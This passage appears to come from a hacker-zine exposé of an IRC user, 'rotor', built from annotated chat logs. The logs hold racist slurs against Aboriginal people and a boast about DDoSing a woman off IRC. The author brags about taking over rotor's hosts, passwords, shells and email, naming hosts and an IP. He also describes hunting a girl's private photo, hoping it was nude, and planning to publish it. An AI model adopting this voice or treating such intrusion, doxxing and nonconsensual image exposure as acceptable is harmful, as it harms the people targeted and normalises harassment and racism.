13:11 <@devii> rofl
13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick
13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick
13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick
13:11 <@devii> cut siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiick
13:12 <@rotor`> you cannot comment on what you dont know
13:12 <@devii> Oh but i know ;/
13:12 <@rotor`> HTF would you know how my parents genes worked
13:12 <@rotor`> HTF would you know how my parents genes worked
13:12 <@rotor`> HTF would you know how my parents genes worked
13:12 <@devii> That abo's cant afford computers.
13:12 <@devii> lol
13:12 <@rotor`> U WOULDNT
13:12 <@rotor`> devii : now your just being racist
13:12 <@devii> lol no im not
13:12 <@rotor`> idk how you rich fucks thinks
13:12 <@rotor`> But why am i on here
13:12 <@devii> AHAHAH
13:12 <@rotor`> on a 56k # Get a job
then.
13:13 <@rotor`> and a pentium 1
13:13 <@rotor`> ?
13:13 <@devii> I WAS ON 56K FOR YEARS.
13:13 <@rotor`> DID U FUCKING THINK OF THAT
13:13 <@devii> Hahahahaaha
13:13 <@devii> aof'hsoidgfisdfg
13:13 <@devii> go drink some more goon then.
13:13 <@rotor`> shut ur rich racist fucking mouth up
13:13 <@devii> petrol sniffuh.
13:13 <@rotor`> So
13:13 <@devii> LOL
13:13 <@rotor`> who cares
13:13 <@devii> Haha
13:13 <@devii> Or steel another one of my thongs.
13:13 <@devii> GO ON DO IT.
13:13 <@rotor`> wow im not a rich stuck up daddys girl
13:13 <@devii> JUST ONE THOUGH.
13:14 <@rotor`> WOWO
13:14 <@devii> Aawh ;p
13:14 <@Torhne> HE WILL STEAL THAT SHIT WHEN YIOU ARE WEARING IT #
Can this kid just shut the fuck up..
13:14 <@devii> ROFL.
13:14 <@rotor`> MY DADDY DOSNT SUPPLY ME EVERYTHING #
Probably because he is a drunk.
13:14 -!- mode/#Killerz [+b *!*@203.51.179.47] by rotor`
13:14 <@devii> COS THATS WHAT ABBO'S DO.
13:14 -!- devii was kicked from #killerz by ping [Banned]
13:14 <@rotor`> no one bags on my heritage
13:35 <@rotor`> blizzy she isnt online anymore
13:36 < blizzy> why?
13:36 <@rotor`> i ddos'd her off
13:36 < blizzy> ok..
# From DDoS attacking NSA to DDoS attacking girls on IRC.... He is truly a
great hacker.
---------------------------------------------------------------------------------------------------------
Unfortunately I didn't manage to get the logs of when rotor joined #b4b0 and
threatened to "own us all" :/
---------------------------------------------------------------------------------------------------------
[6] r0t0r's roots (that still work), ciscos (that still work) and
passwords.
roots that still work:
# For a complete list just scroll up =)
These are the cisco boxes he uses to DoS people with:
He really does have a great selection of passwords:
Rotor has finally figured out he was owned and he has changed passwords on
matts.homeunix.net and cserverz.com. Rest are the same I guess.
I don't have the new IP to "69.17.188.187", but there wasn't anything
interesting on it anyways.
You can find the unreal.conf to his IRC server on his email.
[7] Ok, after getting all of his passwords, shells, email and all, I think it's
time to find that god damn picture!
(20:38:06) r0t0r: for some reason
(20:38:10) r0t0r: i like a pakistani girl
(20:38:48) Blizzy: heheh
(20:38:49) Blizzy: cool
(20:38:57) r0t0r: want a pic!?
(20:39:05) Blizzy: yeah sure
(20:39:14) r0t0r: http://kold.multiply.com/photos/album/1
(20:39:38) Blizzy: she is pretty
(20:40:16) r0t0r: damn right
(20:40:29) r0t0r: she sent me pics of her top half Up
(20:40:33) r0t0r: I tihnk she likez me
# Did she... hmm.. I wanna get my hands on that pic!
(20:45:39) r0t0r: Who's pic did u find!?
(20:45:42) Blizzy: kc
(20:45:43) Blizzy: fuck dude
(20:45:45) Blizzy: she is HOT
(20:45:50) r0t0r: erg
(20:46:01) Blizzy: I want her to have my children
(20:46:03) r0t0r: were did you find it?
(20:46:11) Blizzy: your email.. I was hoping for a naked pic :(
(20:46:15) Blizzy: But dude.. SHE IS HOT
(20:46:16) Blizzy: SO HOT
(20:46:24) Blizzy: fuck...
(20:46:30) r0t0r: YOu didnt hand that pic out did you?>
(20:46:34) Blizzy: Nope
(20:46:43) Blizzy: I just drooled for.. 10 minutes then closed the
window
(20:48:33) r0t0r: Now she is pissed off i tihnk
(20:49:55) Blizzy: tell her I wanna marry her :P
(20:49:56) Blizzy: hehe
(20:50:06) Blizzy: the pic never got public
(21:05:49) r0t0r: LoL
(21:05:53) r0t0r: she hates me now
# Ain't that sad...
Ehm.... www.someurl.com/kc.jpg # need to find someone to host the pic.
[8] Conclusion
r0t0r check list:
1. Own killerz [CHECK]
2. Own matts.homeunix.net [CHECK]
3. Find more shells and own them [CHECK]
4. Expose rotor as a fake and a drunk [CHECK]
5. Expose r0t0rs lame roots [CHECK]
6. Find his cisco's which he uses to DoS people [CHECK]
7. Get his passwords and see if I can find a naked
pic of that girl he is messing around with. [She wasn't naked,
but it was still a nice pic]
Well, I guess that's it.. rotor is owned...